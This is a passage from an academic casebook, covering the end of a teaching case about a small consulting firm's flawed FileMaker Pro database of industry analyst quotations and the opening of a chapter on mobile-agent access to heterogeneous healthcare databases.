The spreadsheet version of this listing is seen in Figure 2. Some information items, such as an analyst’s job title, are not always available. Those cells were left blank. In Excel, this permits information from the cell to its left to spill over into the blank cell, as do the first two analysts’ names. Common publication names were abbreviated, for example “CW” for Computerworld in several rows. A few months later, at a company meeting, Ackerman showed the spreadsheet to his colleagues. By that time it had grown to a few hundred entries, all gathered through his reading of the trade press. The group agreed that the information in it, or that could be in it with a concerted effort to continue and expand its coverage, could be a valuable tool. Its availability, presented as evidence that Balmoral Group’s recommendations are based on hard data, could also provide a competitive edge in obtaining clients. However, the spreadsheet did not lend itself to these uses. It suffered from all the problems of a flat-file structure in what ought to be a multitable database. It had no retrieval facilities other than the text-search capability of its underlying package (Excel, at the time in versions 97 and 98 for Windows and Mac OS, respectively). Finally, the group came up with other data elements that were not being captured but which could be useful, such as the attitude (positive, neutral, or negative) expressed in a quote toward each vendor mentioned in it. As a result, it was decided to develop a “real” database for quotation capture and analysis. Since Ackerman had more background in this area than anyone else then in the small firm, though he was far from an expert, he offered to develop the system, with the others testing it and providing feedback. Balmoral Group’s multiplatform philosophy, and the fact that they had no database server capability at the time, narrowed down the choice of DBMS to FileMaker Pro (FM Pro for short) (Coffey, 2005; FileMaker, 2005; Schwartz & Cohen, 2004). Release 5 was then current and
471
A Database Project in a Small Company
Figure 2.
was used. Release 6 appeared during the period covered by this case, but was not felt to offer enough advantages to justify upgrading. (Release 7, which did offer major conceptual improvements, came out later.) An informal version of prototyping4 was used for development. Ackerman bypassed conventional methods for requirements determination5. Instead, he intuited system requirements from his experience with the Excel spreadsheet and from colleagues’ comments. Along similar “quick and dirty” development lines, no functional or design specifications were written. Ackerman developed a “first cut” system, populated it with quotes imported from his spreadsheet, and sent it to colleagues to try out, review, and comment.
CASE DESCRIPTION The first FileMaker Pro version of the database implemented the entity-relationship diagram in Figure 3.
472
This ERD was not drawn at that time. It is an after-the-fact description of the original database. It represented these facts: •
•
An analyst may be quoted many times, but quote is by one analyst. (A handful of exceptions arose later, where a reporter attributed a quote to two or more analysts. Most of these were excerpts from reports by multiple authors. These were handled as multiple quotes, one by each author, with identical content and cross-reference(s) to the other author(s) in the “article summary” text field.) A firm may employ many analysts, but each analyst is employed by one firm. (Job changes result in updating the analyst’s record with his or her new employer. This system was not intended to, and did not store analysts’ complete employment histories. There was a text field in each analyst record where freeform information about previous employers could be entered if desired.)
A Database Project in a Small Company
Figure 3. Quote
Analyst Office Firm
•
•
A firm may have many offices, but each office belongs to one firm. (Two firms may have offices at the same place, such as when one is a subsidiary of the other that does business under its own name, but these were considered conceptually separate.) An office may house many analysts, but each analyst works at one office. (An analyst whose work location varies, such as a telecommuter, is associated with only one location in the database.)
It may seem that linking an analyst to a firm is not strictly necessary, since an analyst is at an office, which in turn belongs to a firm. This link exists because analysts’ office locations are not always known. Many quotes identify the speaker’s employer, but not his or her location. While it is usually possible to find it with a little detective work, it is not always worth the time to do so, and not always possible when a quote is being entered, such as when reading a newspaper on a plane. A more detailed ERD would show this relationship as optional—an analyst is located at zero to one offices—while that of an analyst to a firm is mandatory, with a minimum cardinality of one on the firm side. Keys to these four tables were as follows: • •
Analysts and offices were assigned unique numerical sequential keys by FM Pro. Firm names were used as primary keys to firm records on the assumption that a firm
•
would not choose a name already used by another. This is a dangerous assumption in theory (Connolly & Begg, 2005, p. 451; Hernandez, 2003, pp. 262-263; Riordan, 2005, p. 34, as well as many other places), but was considered safe as a practical matter, and held up in practice. Its biggest problem came from violating Hernandez’s final requirement (“its value can be modified only in rare or extreme cases”) because firms change their names, if not frequently, at least more than rarely. (This is not a formal requirement of database theory, but is an important practical guideline.) The choice of firm name as a primary key required someone to update the records of all analysts at a firm when a firm changed its name, since it is a foreign key in those records. Quote records did not have a key. It was felt that quotes would be accessed only through searches on their contents, so a key would not be needed. While this assumption also held up in practice, the decision not to have a key for quote records had implications for database normalization that will be discussed later.
These tables had the following columns (data fields). Many of the informational items about analysts, firms, and offices are optional. •
Quote: Analyst ID no. (foreign key), publication, date of issue, cover date, page number, author, summary of article, content of quote, vendor(s) mentioned, attitude of quote toward each vendor mentioned, initials of person entering quote, date quote was entered. Having both “date of issue” and “cover date” may seem redundant. “Date of issue” was a calendar date of type Date to facilitate searching and sorting. (One often wants to know what analysts said during specific time periods, such as before and after an announcement.) Some publications
473
A Database Project in a Small Company
•
•
•
do not have a calendar date as their date of issue; for example, a monthly might have an issue dated July 2005. This is not a valid Date data type, but someone seeking an article in a library needs this information. The “cover date” field held it as a text string. It was left empty if the date of issue was a single calendar date, as is true of dailies and most weeklies. When it was not, the first date of the period in question was used for “Date of issue”: the July 2005 issue in this example would have been assigned July 1, 2005 as its “date of issue.” Analyst: ID no. (key), family name, given name, middle name, courtesy title (Mr./Ms./ etc.), job title, firm name (foreign key), office ID (foreign key), professional specialization, service or other division of the firm, previous employers, telephone numbers (direct, fax, home, mobile), e-mail address, list of vendors covered, other notes. Office: ID no. (key), firm name (foreign key), address (first line, second line, city, state/province/etc., postal code, country), main telephone number, main fax number. Firm: name (key), category (industry analysis, financial analysis, other, unknown), names of key people, capsule description, client base, major services, size, home page URL, usual e-mail address format, office ID of headquarters6 (foreign key).
From a theoretical database design perspective, this design has several flaws. For one thing, it violates normalization (Codd, 1990) in (at least) two ways. First normal form (1NF) is violated because the vendors mentioned in each quote were listed in a repeating field within the Quote record, not in a separate table. This was done as a practical implementation matter. It was considered unlikely that any quote would ever mention more than 10 vendors. The wasted space of leaving room for 10, even if none were mentioned, was negligible.
474
However, the decision not to have a key to quote records also played a part here. Absent such a key, it was impossible to set up a separate table for vendor mentions, and link each mention to its associated quote. The Quote table is also not in second normal form (2NF) because there can be several quotes in one article. The bibliographic data of the article, combined with the analyst’s ID no., is a candidate key for the quote record. (A unique numeric key might be better, but it will do.) Information such as the name of the article’s author and the content summary of the article depend only on part of this candidate key: the bibliographic data. It is repeated in the record of each quote appearing in an article. It was not necessary for the person entering data to retype it—an FM Pro script copied all the article-related information from the first quote into all subsequent quote records for the same article—but the redundant data remained in the database, and it was theoretically possible to modify it in one quote record but not the others, creating what is known as an update anomaly. A better database design would use a separate table for articles, and would include the key of that table as a foreign key in each Quote record. These deficiencies were the result of not following a systematic database design approach. When database design begins with an ERD and develops tables from it, normalization violations such as this tend not to occur (Connolly & Berg, 2005, p. 399; Hoffer, Prescott, & McFadden, 2002, p. 192ff; as well as many other places), though “the E-R approach alone does not guarantee good relational design” (Kifer, Bernstein, & Lewis, 2005, p. 87). A better ERD on which to base the database would therefore have been as illustrated in Figure 4. Despite these design deficiencies, the database system worked well enough for one person to enter data. As the content of the database grew, Balmoral Group was able to sell it to clients. There was no strategy for doing so, but the attraction of
A Database Project in a Small Company
Figure 4. Vendor Mention
1. Quote
Article
Analyst Office Firm
additional revenue was strong, and this had always been part of the concept. The clients who paid for its use soon wanted more complete coverage than the random initial data collection methods that depended on Balmoral employees encountering quotes in their professional reading and sending them to Ackerman. As interest in the information grew, however, it became necessary to hire additional people to obtain more complete coverage of the ICT trade press. Balmoral did not then have a database server and did not want to invest in one, due to the cost and complexity of moving from a single-user to a multiuser database. The issues were not only hardware and software, but the need to add a “real” IS capability to an organization that had managed to do quite well until that point without one. It was felt, perhaps wrongly in retrospect, that it was worth making some technical sacrifices in order to continue in this informal mode of operation, and to avoid either having to hire an IS specialist or outsource this aspect of the firm’s work. Instead, procedures were adopted to handle the necessary coordination, with a staff member assigned (in addition to her other duties) to coordinate it. The number of people entering data eventually grew to 10 on a regular basis, with a few others augmenting their efforts at peak times. Having this many people enter data required a complex operational procedure, as follows:
2.
3.
4.
Each “reader” (person reading articles and entering quote data from them) received a fresh copy of the database each month, containing the most recent version of the Analyst, Firm, and Office tables7. This version included all the updates, such as new analysts or firms, entered by other readers during the previous month. The database coordinator, Sandi Carpenter, would assign each reader a range of keys for analyst and office IDs. The reader would reset the number at which FM Pro begins its sequence of keys to the first number in this range. Thus, analyst records created by different readers would all have unique keys. When the reader exhausted this range, the database coordinator would give him or her a new range to work with. The database coordinator, in turn, kept track of the key range assigned to each reader. Each reader would work independently, using hard-copy publications assigned to him or her and articles that Tamara Hudson downloaded from online sources, such as LexisNexis, and distributed to readers. Periodically, the readers would send files to Carpenter. Specifically, they would send seven files: • • •
• • • •
New quotes New analysts Modified analysts (firm changes, title changes, finding information not previously known, etc.) New firms Modified firms New offices Modified offices
The first of these files was the reader’s entire Quotes file, since each reader started each time period with an empty Quotes file. The others were extracted from the complete Analysts, Firms, and Offices files. New enti-
475
A Database Project in a Small Company
5.
476
ties were extracted based on record-creation date being within the current time period. Modified entities were extracted based on record creation date being before the current time period, but record modification date being within it. FileMaker Pro maintains both these dates automatically, though it is up to the database designer to make them user-visible. Carpenter would then check for duplicate data entered by more than one reader. This arose in part because new firms and analysts often showed up in multiple quotes at about the same time. If the first two times John Jones of Jones Associates was quoted occurred in the same week, two readers might find him and create records for him at about the same time. In addition, two or more online search strings would occasionally return the same article. The nature of online information retrieval, and the limits of LexisNexis on the complexity of a single search string, required multiple searches in order to retrieve all the articles of interest. It was not practical to read all the articles these searches retrieved in advance to eliminate duplicates before assigning the retrieved articles to readers. Carpenter would also check updates for consistency and overlap. For example, one reader might find, via a citation, that an analyst was promoted from Research Director to Vice President. Another might find that she moved from Massachusetts to California. Her record in the master copy of the Analysts’ table must be updated to reflect both these changes. FM Pro has a command to find all duplicated values in a given field, so identifying potential duplicates is not difficult. However, the word “potential” is important. Human names are not unique. With 2,000+ high-tech industry analysts, identical names occur from time to time. Carpenter had to check
6.
other information to determine if two records having the same analyst name represent the same person or different ones. When duplicate records were found, one was deleted. In addition, if the duplicate was of an analyst or a firm, it was necessary to take all the records that had been linked to the deleted record and relink them to the one retained. For example, suppose one reader who has analyst keys starting with 7000 and another who has keys starting with 8000 both found John Jones, who was not previously in the database. Carpenter would get two John Jones records, one with a key of (say) 7012 and the other with (say) 8007. Suppose she determined that they represent the same person. If record 8007 was deleted, all quotes having 8007 in their foreign-key Analyst ID field had to have it changed to 7012. This is not conceptually difficult, but can be time-consuming. Carpenter also had to check for multiple records referring to the same person in different ways. People use different forms of their names: Robert Enderle is often called “Rob”; some reporters who do not know him well also assume the more common “Bob.” They change names, with Traci Bair becoming Traci Gere and sometimes cited as Traci Bair Gere. Reporters misspell names, with Dan Kusnetzky cited as Dan Kuznetsky or any of several other variations. Family and given names, especially but not only Asian, may appear in either order: Sun Chung in one article could be Chung Sun in another. (These are all real examples.) Some of these variations result from reporter errors, not database design or business process deficiencies, but they must be dealt with no matter what their cause is. The database, which looks up analysts by family name, will report no match in all these cases except the first, causing the reader to create a new entry for an analyst who is
A Database Project in a Small Company
7.
8.
actually already in the database. Individual readers cannot be expected to keep up with every analyst in the database (over 8,000 by 20038) in order to prevent confusion. All these names must be made uniform, with extra analyst records removed and their quotes relinked to the correct analyst record, before the database can be analyzed for reports or made available to clients. At least monthly, more often if the number of changes or additions warrants, Carpenter sent updated versions of the Analysts, Firms, and Offices tables to the readers. After all quotes for a given month were entered, she sent the complete tables to Balmoral Group research analysts to write client reports and upload the database to Balmoral Group’s Web site. These procedures worked because Balmoral Group clients saw only monthly updates to the database. This kept the internal updating and quality control processes from their eyes, and prevented them from becoming a client satisfaction issue. The database was visible to them in two ways: •
•
Online, to download to their own computers as a freestanding application that does not require the user to have FileMaker Pro installed. (A license for the FileMaker Pro Developer package allows royalty-free distribution of such applications. A person using an application it creates can modify database contents, but can be prevented from changing database structure, screens, predefined queries, reports, etc.) Through reports, written each month by Balmoral Group analysts and sent to clients. These reports analyzed the quotes about the client and its chief competitors during the previous month, including subjects accounting for the lion’s share of analyst attention,
and trends in analyst attitudes toward the client and its competitors. Clients were given a report on one month’s quotes by the 15th of the following month. This allowed time for these four steps: a.
b. c.
d.
quotes published at the end of one month to become available at online information retrieval services about 3 or 4 days into the following calendar month; those quotes to be entered by the readers; the database updates to be merged and the database cleaned up; and the data to be analyzed and the reports themselves written.
The start of a typical report, edited to remove actual company names, is shown in Figure 5. A typical report would be 8 to 10 pages long. About half of this content summarized overall industry analyst quotation activity for the previous month, and was generic to all client reports. The other half was specific to each client, though some parts of the analysis could often be reused when two clients were in the same industry segment. In this situation, one report client would often also be in other clients’ “key competitor” lists. By this time the database had several user clients, and was responsible for about a third of Balmoral Group’s revenue. Feedback from clients and internal users (the latter using it primarily in the context of report writing) highlighted several areas of potential improvement. Ackerman, who continued to be the sole database developer throughout the period covered by this case, imple-
477
A Database Project in a Small Company
Figure 5.
mented them, again without benefit of a formal development process. The second major version of the database was released to customers in October 2001. It improved the appearance of most user-visible screens. Functionally, this version of the system provided users with easy-to-use standard queries. While FileMaker Pro’s “Find” facility is not difficult to master, far easier than (for example) SQL’s “Select,” it can intimidate those whose computer literacy consists of word processing and e-mail. By this time Balmoral had gained sufficient experience answering client inquiries, as well as using the database for writing reports and its other internal needs, to know what most queries would be. These common queries were supported by forms that showed only the data fields needed
478
for the query at hand, backed up by custom scripts (FM Pro’s term for programs in its proprietary language) as needed, and made available through buttons on a main menu page. For example, a client who wanted to know how favorable comments by analysts about a particular firm were during the past month needed only to click on “Show Quotations Mentioning a Vendor,” select the vendor name from a dynamic pull-down list, and enter the starting and ending dates of that month. The query screen looked like Figure 6. The result would list all the queries and provide a count of those that were positive, neutral, or negative, with a summary score from 0 to 2 reflecting their distribution among these three groups. (Zero meant all negative quotes, 2 was
A Database Project in a Small Company
the positive limit.) By clicking on the summary line of a quote in the list, the user could see all the available information about that quote. The top of a results page could look like Figure 7. The result, according to users, was a major improvement in ease of use. The underlying data model, however, did not change. Another change made at this time was to enlarge the repeating field for vendor mentions from 10 vendors mentioned in a quote to 12. The assumption made early on, that “it was considered unlikely that any quote would ever mention more than ten vendors,” turned out to be wrong. Reporters often quote reports from “market watcher” firms such as International Data Corporation (IDC) that list the top vendors in various markets. While these vendor lists are usually shorter than 10, there is no absolute upper limit. Twelve took care of just about every case, but not all. As a practical matter, it was felt that the inaccuracies
resulting from omitting vendors after that point was negligible, since important vendors tended to be among the first few mentioned. Still, this is an area where poor database design had user-visible repercussions. Finally, Ackerman also wrote a full user’s manual at this point. This was initially about 20 pages long, growing to 35 as the system (and Balmoral’s understanding of what tended to confuse users) evolved. It reduced the number of support calls for the system, and was a selling point for new clients. An enhancement to this release in May 2002 added a new table for publications. This table was added to allow categorization of publications by region (North America, Europe, Asia/Pacific, Rest of World) and coverage (IT, general business, specialized business, general/other). This was done in response to customer requests to be able to track coverage by these criteria. This table used the
Figure 6.
Figure 7.
479
A Database Project in a Small Company
name of the publication as its key. That, in turn, led to difficulties later, since many general-interest publications have traditional names such as Times, Journal, Courier and so on. It was necessary to add location information to their “titles” in order to make the keys unique and tell the publications apart: Times (London), Times (Seattle) and so on. It also required readers to know the correct form of a publication name to check the database: is it “Times (New York),” “New York Times” or “The New York Times?” Guidelines were developed to deal with this problem, but guidelines can never foresee every possible situation, and humans never read guidelines perfectly in every case. The logical database design at this point looked like this, with one publication potentially having many quotes, but each quote appearing in a single publication (see Figure 8). Version 3 of the database was released to clients in November 2002. The major change here was in the forms and queries for accessing analyst information. These were totally redone to resemble those used to access quote information. The underlying data tables, however, did not change. In February 2003, a new table was added to Version 3. It did not affect the essential functions of the database, but was introduced to deal with an operational issue. Clients used the notes column of the analyst table to record information about their interactions with the analyst—things they have learned about him or her, and other items that may be of future use in planning how
they will work with that person. However, when clients get an updated copy of the database each month, it includes a new analyst table that does not have these notes. Adding them to the main Balmoral Group database is not a viable option, since it would make one client’s notes about a particular analyst visible to all other clients, as well as creating problems when more than one client had notes on a given analyst. Merging a client’s existing notes with the newly updated Analyst table, when it is downloaded each month, is possible, but is more technical work than many database end users are ready for. By adding a separate table to contain these notes, the table can be left in place when the new version of the database is downloaded. The new table contains two columns: the note and the analyst ID as a foreign key. It has no key of its own since it is only accessed as an adjunct to the Analyst table. Conceptually, database design principles allow two tables in a one-to-one relationship to be combined with each other, but in this case, the need for separate operational treatment of different data elements led to splitting it (see Figure 9). At this time, providing quotation tracking and analysis services was a major line of business for Balmoral Group. It kept eight readers busy, some full time and some part time. It also supported the database coordinator, about three-quarters of the project manager’s time, and about a quarter of the time of three other professionals (most of it during a 1-week period of intensive report-writing
Figure 8.
Figure 9. Quote
Quote
Publication
Analyst
Notes
Analyst
Office Firm
480
Publication
Office Firm
A Database Project in a Small Company
activity each month). Clients found the service to provide valuable information and to be cost-effective, as the major expense items were spread over multiple clients. In terms of cost, eight readers were about $15,000 per month, with the other professionals adding about the same amount, for a total of about $360,000 per year. Income was slightly more than this. There was a great deal of leverage in the system, in the sense that over 60 percent of the expenses (the readers, database coordinator, and project manager) were fixed in the short run. Revenue from additional clients, other than the additional analyst time required to write their monthly reports, was largely profit. Conversely, the loss of a client would be felt severely. In addition, Balmoral Group management felt that the system was a major factor in selling its other products and services.
CURRENT CHALLENGES / PROBLEMS FACING THE ORGANIZATION By the first quarter of 2003, it was generally recognized at Balmoral Group that: •
•
Clients wanted online access to the database. Downloading it once a month was not an acceptable option. There was concern that lack of online access would lead to clients dropping the service. Waiting as long as 6 weeks for a quote to appear in the database was also not acceptable. (The maximum delay occurred when a quote from the beginning of one month was not available until the database update in the middle of the following month. For example, a quote published on June 2, presumably reflecting an analyst’s feelings in late May, would not be available until July 15.) It was hoped that putting the database online would make it possible to shorten this
•
•
lag by having individual quotes available soon after they were entered. This lag was also a potential client loss issue. The operational complexity of coordinating the readers’ database updates was a burden. A shared database would reduce it. Consider the earlier example of two readers finding John Jones at different times in the same month. With a shared database, the first reader to encounter him would enter him into the database. The next reader to enter a quote by Jones, whether a minute or a week later, would find him in the database and would therefore not create a new record. The deficiencies of the original database design, which had not been changed even though the user interface had been modernized, were beginning to show in data quality issues as the database expanded. This was not yet a client-loss issue, but the analysts preparing monthly reports found themselves spending what they considered an excessive amount of time resolving quality issues, and working considerable overtime to get reports out on schedule despite this.
These requirements were the subject of a great deal of discussion among Oliviera, Ackerman, and senior staff members of the firm. Two changes in the business environment influenced the decision. One was Ackerman’s planned departure, which has already been mentioned, and which left Oliviera as the sole owner and decision-maker. The other was the expected purchase of Balmoral Group by a marketing firm with multiple synergistic subsidiaries. This was expected to provide both financial and technical resources with which to develop a “real” IT infrastructure and take this system to the next level. Oliviera decided to initiate two parallel development projects. One was to take the existing FileMaker Pro database and put it online on a server. This was to be a short project intended as an intermediate step. This database would
481
A Database Project in a Small Company
retain all the good and bad points of the FM Pro system, including its data model. The other was to develop a new SQL-based database with a totally redesigned, properly normalized database. Its user interface would be different, since it would use different software, but would offer at least the same functionality as the mid-2003 version of the system. Both these development projects would be outsourced to IS professionals in the acquiring firm. With this in mind, the FM Pro application was frozen in May 2003 except for bug fixes and mandatory changes.
REFERENCES Alcatel. (2005). Analysts’ corner. Retrieved February 6, 2005, from http://www.alcatel.com/ industry_analysts/index.jhtml Codd. (1990). The relational model for database management: Version 2. Reading, MA: Addison Wesley. Coffey, G. (2005). FileMaker Pro 7: The missing manual. Sebastopol, CA: O’Reilly. Columbus, L. (2004) Getting results from your analyst relations strategy. Lincoln, NE: iUniverse. Computer Associates. (2005). Industry analysts. Retrieved February 6, 2005, from http://www3. ca.com/analyst Connolly, T., & Begg, C. (2005). Database systems: A practical approach to design, implementation and management, 4e. Reading, MA: Addison-Wesley. FileMaker. (2005). FileMaker Pro 7. Retrieved February 6, 2005, from http://www.filemaker. com/products/fm_home.html Forrester Research. (2005). Corporate fact sheet. Retrieved February 6, 2005, from http://www. forrester.com/FactSheet
482
Gartner Group. (2005). Investor relations. Retrieved February 6, 2005, from http://investor. gartner.com Hernandez, M. J. (2003). Database design for mere mortals, 2e. Reading, MA: Addison-Wesley. Hewlett-Packard. (2005). Industry analyst relations. Retrieved February 6, 2005, from http:// www.hp.com/hpinfo/analystrelations Hoffer, J. A., Prescott, M. B., & McFadden, F. R. Modern database management, 6e. Upper Saddle River, NJ: Prentice-Hall. Insight Marketing. (2005). Industry analyst relations. Retrieved February 6, 2005, from http://www.insightmkt.com/services/analyst_relations.asp International Data Corporation. (2005). Browse analysts. Retrieved February 6, 2005, from http:// www.idc.com/analysts/analysthome.jsp Kensington Group. (2004). Portal to the world of industry analysts. Retrieved February 6, 2005, from http://www.kensingtongroup.com/Links/ companies.html. (As of September 2005 access to this site is restricted. However, a similar list is publicly available at http://www.tekrati.com. Click on “Firms Directory” on the left side of its home page.) Kifer, M., Bernstein, A., & Lewis, P. M. (2005). Database systems: An application-oriented approach, 4e. Reading, MA: Addison-Wesley. Riordan, R. M. (2005). Designing effective database systems. Reading, MA: Addison-Wesley. Schwartz, S. A., & Cohen, D. R. (2004). The FileMaker Pro 7 bible. Hoboken, NJ: John Wiley & Sons. Sybase. (2005). Industry analyst. Retrieved February 6, 2005, from http://www.sybase.com/pressanalyst/industryanalyst
A Database Project in a Small Company
Tekrati. (2005). The industry analyst reporter. Retrieved February 6, 2005, from http://www. tekrati.com
5 6
7
ENDNOTES 1
2
3
4
Since this case does not mention any other type of analyst, industry analysts will be referred to as just “analysts.” The firm name and all individual names are fictional. No similarity to any real person is intended. Product names, which may be trademarks or registered trademarks of those products’ suppliers, are used in this paper for identification purposes only. This topic is covered in every introductory MIS textbook, typically in its last half in a chapter with a title such as “System Development Methods,” and in more depth in every systems analysis textbook. Rather than provide specific references, which would create an excessively long list while inevitably omitting many widely used texts, we refer the reader to any book of this type that he or she happens to have or is familiar with.
8
See previous endnote. The headquarters relationship between firms and offices is not shown in the ERD since it is of little practical use. In FileMaker Pro 5 (the version used in this case) and 6, each table is a separate file as seen by the OS. The database is the set of such files, just as it is the set of tables in database theory. FileMaker Pro 7 and 8 (the current release), allow (but do not require) multiple tables to share a single file. This is closer to the Access approach that some readers may be familiar with, where tables share one OS-visible file. In Access, it would have been more difficult to send some tables but not others to readers. In FM Pro 7 or 8 it would have been simpler: the tables the readers get each month, and only those tables, could have been put into one file. There are three reasons why this figure is so much higher than the figure of 2,000+ given for the industry overall. One is that the estimate of 2,000+ is deliberately conservative. A second is turnover: while there may be 2,000 industry analysts at any one time, there were more than that over a 3-year period. A third is that the database also included quotes from people who would be more accurately described as financial analysts or some other related category.
This work was previously published in Journal of Cases on Information Technology, Vol. 8, Issue 3, edited by M. Khosrow-Pour, pp. 24-40, copyright 2006 by IGI Publishing (an imprint of IGI Global).
483
484
Chapter 2.5
Integrating Mobile-Based Systems with Healthcare Databases Yu Jiao Oak Ridge National Laboratory, USA Ali R. Hurson Pennsylvania State University, USA Thomas E. Potok Oak Ridge National Laboratory, USA Barbara G. Beckerman Oak Ridge National Laboratory, USA
ABSTRACT
INTRODUCTION
In this chapter, we discuss issues related to ehealth and focus on two major challenges in distributed healthcare database management: database heterogeneity and user mobility. We designed and prototyped a mobile-agent-based mobile data-access system framework that can address these challenges. It applies a thesaurus-based hierarchical database federation to cope with database heterogeneity and utilizes the mobile-agent technology to respond to the complications introduced by user mobility and wireless networks. The functions provided by this system are described in detail and a performance evaluation is also provided.
The integration of healthcare management and advances in computer science, especially those in the areas of information-system research, has begotten a new branch of science: e-health. E-health is becoming more and more widely recognized as an essential part for the future of both healthcare management and the health of our children. The 2001 President’s Information Technology Advisory Committee, in its report “Transforming Healthcare through Information Technology,” noted that information technology “offers the potential to expand access to healthcare significantly, to improve its quality, to reduce its costs, and to transform the conduct of biomedical
Integrating Mobile-Based Systems with Healthcare Databases
research”(p. 1). Although much has been done, reality has proven to us that there are still a great number of problems remaining to be taken care of. Health and human-services secretary Mike Leavitt told the Associated Press (2005) in an interview after hurricane Katrina, “There may not have been an experience that demonstrates, for me or the country, more powerfully the need for electronic health records…than Katrina” (p. 1). The article also pointed out that the “federal government’s goal is to give most Americans computerized medical records within 10 years”(p. 1). E-health embraces a broad range of topics, such as telemedicine, medical-record databases, health information systems, genomics, biotechnology, drug-treatment technologies, decision-support systems, and diagnosis aids, just to name a few. In this chapter, we focus on the topic of technologies that deal with integrating mobile-based systems with healthcare databases. One of the major challenges in healthcare database integration is the fact that the lack of guidance from central authorities has, in many instances, led to incompatible healthcare database systems. Such circumstances have caused problems to arise in the smooth processing of patients between health service units, even within the same health authority (Svensson, 2002). For instance, electronic health record (EHR) systems have been used in practice for many years. However, they are often designed and deployed by different vendors and, thus, patients’ information is collected and stored in disparate databases. Due to the lack of uniformity, these systems have very poor interoperability. Even though the wide deployment of networks has enabled us to connect these databases, a large amount of work still needs to be handled manually in order to exchange information between the databases.F There are two potential solutions to the problems of interoperability and automated information processing: redesigning and reimplementing the existing databases or using a database federation. Redesigning and reimplementing existing
databases require large capital investments, and are difficult to achieve. An alternative solution is to build a database federation in which problems caused by database heterogeneity are remedied by the use of a mediator: metadata. This approach is often referred to as the multidatabase solution (Bright, Hurson, & Pakzad, 1994). The Internet and the client-server-based computing paradigm have enabled us to access distributed information remotely, where the data servers act primarily as an information repository, the user’s workstation bears the brunt of the processing responsibility, and the client and server communicate through a well-formulated network infrastructure. Recently, the surge of portable devices and the wide deployment of wireless networks have ushered a new era of mobile computing. Users access information via wireless media and from lightweight and less powerful portable devices. This paradigm shift permits the exchange of information in real time without barriers of physical locations. This is particularly helpful in situations where emergency medical teams need to access patients’ information as soon as possible at a disaster site (Potok, Phillips, Pollock, & Loebl, 2003). However, mobile computing has also brought upon several technical challenges. First, unlike workstations, portable devices usually have limited CPU (central processing unit) processing capability and limited battery capacity. Second, low bandwidth and intermittent wireless network connections are often debilitating to client-server applications that depend on reliable network communications. The mobile-agent-based distributed system design paradigm can address the aforementioned limitations. Unlike the client-server-based computational model, which moves data to computation, mobile agents move computation to data. This allows mobile users to take advantage of the more powerful servers on the wired networks. In addition, mobile agents are intelligent and independent entities that posses decision-making capabilities. Once dispatched, they are able to
485
Integrating Mobile-Based Systems with Healthcare Databases
fulfill tasks without the intervention of the agent owner. Network connectivity is only required at the time of an agent’s submission and retraction. Therefore, the use of mobile agents alleviates constraints such as connectivity, bandwidth, energy, and so forth. We proposed and developed a prototype of a novel mobile-agent-based mobile data-access system (MAMDAS) for heterogeneous healthcare database integration and information retrieval (Jiao & Hurson, 2004). The system adopts the summary-schemas model (SSM; Bright et al., 1994) as its underlying multidatabase organization model. Queries are carried out by mobile agents on behalf of users. Via a medical thesaurus, created by combining the Medical Subject Headings (MeSH) thesaurus (Chevy, 2000) and an Englishlanguage thesaurus WordNet (Miller, Beckwith, Fellbaum, Gross, & Miller, 1990), MAMDAS supports imprecise queries and provides functions for user education. The purpose of this chapter is to provide details about the tools we developed for disparate healthcare database management and their potential applications. The rest of the chapter is organized as follows. First it provides the background, and then presents the design, functions, application, and performance evaluation of MAMDAS and a medical thesaurus MEDTHES. Finally, we summarize this chapter and discuss future trends.
BACKGROUND In this section, we provide an overview of the current solutions to healthcare database management and introduce the two technologies on which we built our system: SSM and mobile-agent technology.
Healthcare Database Systems The Veterans Health Administration (VHA) clinical information system began in 1982 as
486
the Decentralized Hospital Computer Program (DHCP) and is now known as VistA (Veterans Health Information Systems and Technology Architecture; Hynes, Perrin, Rappaport, Stevens, & Demakis, 2004). VistA has evolved into a very rich healthcare information system that provides the information-technology framework for VHA’s approximately 1,300 sites of care. VistA is built on a client-server architecture that ties together workstations and personal computers with nationally mandated and locally adapted software access methods. More specifically, VistA comprises more than 100 applications that clinicians access via the Computerized Patient Record System (CPRS) GUI (graphical user interface) to pull all the clinical information together from the underlying facility-based programming environment. CPRS provides a single interface for healthcare providers to review and update a patient’s medical record. More than 100,000 VHA healthcare providers nationwide currently use CPRS. One important reason for VistA’s success is the existence of a central authority. All VHA facilities are mandated to apply the same database-management system and unified access methods, which significantly eases the problem of interoperability among systems at different sites. Unfortunately, this uniformity is not a norm in today’s healthcare databases. More often, we have to deal with heterogeneous databases that are designed and developed by different vendors. IBM’s DiscoverLink targets applications from the life-sciences industry (Hass et al., 2001). It is a fusion of two major components: Garlic (Carey et al., 1995) and DataJoiner (Cahmberlin, 1998). Garlic is a federated database-management system prototype developed by IBM Research to integrate heterogeneous data. DataJoiner is an IBM federated database-management product for relational data sources based on DATABASE 2 (Cahmberlin). It is a mediator system that limits itself to metadata exchange and leaves the data in their original databases and format. When an application submits a query to the DiscoveryLink
Integrating Mobile-Based Systems with Healthcare Databases
server, the server identifies the relevant data sources and develops a query execution plan for obtaining the requested data. The server communicates with a data source by means of a wrapper, a software module tailored to a particular family of data sources. The wrapper is responsible for mapping the information stored by the data source into DiscoveryLink’s relational data model, informing the server about the data source’s query-processing capability, mapping the query fragments submitted to the wrapper into requests that can be processed using the native query language of the data source, and issuing query requests and returning results. Since data sources may take one of the many formats—relational database, object-oriented database, or flat files such as XML (extensible markup language) files and text files—a wrapper is needed for each format. Thus, wrapper development is the key to the extensibility in DiscoveryLink. The TAMBIS (Transparent Access to Multiple Bioinformatics Information Sources) project (Stevens et al., 2000), as its name suggests, aims to provide transparent access to disparate biological databases. TAMBIS includes a knowledge base of biological terminology (the biological concept model), a model of the underlying data sources (the source model), and a knowledge-driven user interface. The concept model provides the user with the concepts necessary to construct multiplesource queries, and the source model provides a description of the underlying sources and mappings between the terms used in the sources and the terms defined in the concept model. In other words, TAMBIS utilizes a domain-specific ontology for heterogeneous data-source integration. It is a novel and valid approach. However, the depth and quality of the TAMBIS ontology are difficult to evaluate because the ontology contents are not publicly available. The PQL query language proposed by Mork, Shaker, Halevy, and Tarczy-Homoch (2002) intends to integrate genetic data distributed across the Internet. It is essentially a query language for
